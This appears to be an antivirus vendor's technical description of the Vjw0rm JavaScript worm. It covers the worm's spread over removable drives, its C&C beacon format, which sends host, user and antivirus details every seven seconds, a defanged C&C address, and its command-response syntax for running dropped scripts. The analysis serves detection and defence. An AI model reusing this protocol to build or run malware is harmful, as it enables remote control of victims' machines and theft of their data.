Worm:JS/Vjw0rm

Technical Details

The Vjw0rm worm is a malicious JavaScript file that spreads by creating copies of itself on accessible removable storage devices.

While active, the worm sends a network request to its C&C server every 7 seconds, providing information about the infected machine and awaiting additional instructions from its operator(s). If it receives instructions, the worm can execute them on the infected machine.

Arrival

This worm can arrive on a computer in several ways:

Propagation

Once it is present on a computer, the worm can propagate or spread copies of its malicious file by infecting removable storage devices that are inserted and accessible. It does so by performing the following set of actions every 7 seconds:

Persistence

In addition to propagating itself to maintain its presence, the worm can remain persistent on the infected machine in several ways:

Network activity

Vjw0rm contacts a remote C&C server to provide its operator(s) with information about the infected machine, as well as to retrieve any additional instructions they may issue.

Request

Every 7 seconds, the worm sends a POST request with a custom User-Agent to its C&C server. This allows the worm's operator(s) to identify which infected machines are online (and so are available to receive commands), as well as providing some basic information about the machines.

The request can be defined as:

 POST [host]:[port]/Vre User-Agent: [tag]\[logicaldiskserialnum]\[computername]\[username] \[osnamever]\[avdisplayname]\\[vbc_exist]\[prev_infected]\

Where the variables are:

• def_host & def_port: Pre-defined C&C IP address & port
• tag: Can be defined both pre- and post-infection. It can be set post-infection through the rename functionality from the C&C server. This is useful for tagging and tracking infected computers
• logicaldiskserialnum: Logical disk's volume serial number
• computername & username: These are taken from environment variables
• osnamever: Gets the operating system version (e.g. Microsoft Windows 7 Enterprise)
• avdisplayname: Gets the display name of any running anti-virus (works both pre and post Vista by checking both 'winmgts:\\localhost\root\securitycenter' and '...\securitycenter2')
• vbc_exist: Checks for .NET VBC (Visual Basic Compiler) v2.0.50727
• prev_infected: Returns the value of the registry key, "HKCU\vjw0rm". This indicates if the user has been previously infected through the worm module, which means that the script has been executed from the root directory of an infected removable storage device

An example of the POST request:

 POST 94[.]237[.]68[.]129[:]2828/Vre User-Agent: HookKernel_A8D34214\MYCOMPUTER\Joe\Microsoft Windows 7 Professional\undefined\\YES\FALSE\

Response

The worm's operator(s) can send a response to the infected machine's POST request that contains commands for the machine to execute. The response can be defined as:

[command][SPL][arg1][SPL][arg2]

Where the variables are:

• SPL: Delimiter (The default is |V| on both the original C&C executable and the script)
• command: Remotely issued instructions to be executed
• arg1 (optional): A payload, usually a script
• arg2 (optional): Usually a filename

An example of a response that gives instructions to drop and execute an additional script would be:

Sc|V|somescript|V|randomstring.ext

Where Sc is the command for executing an additional malicious module/script, somescript is the actual payload, randomstring is a randomly generated filename, and ext is the extension selected by the operator on the C&C server.

Executing remotely-issued commands

Vjw0rm is also able execute 5 distinct commands, any of which it can receive from the C&C as a response to a POST request. The commands are: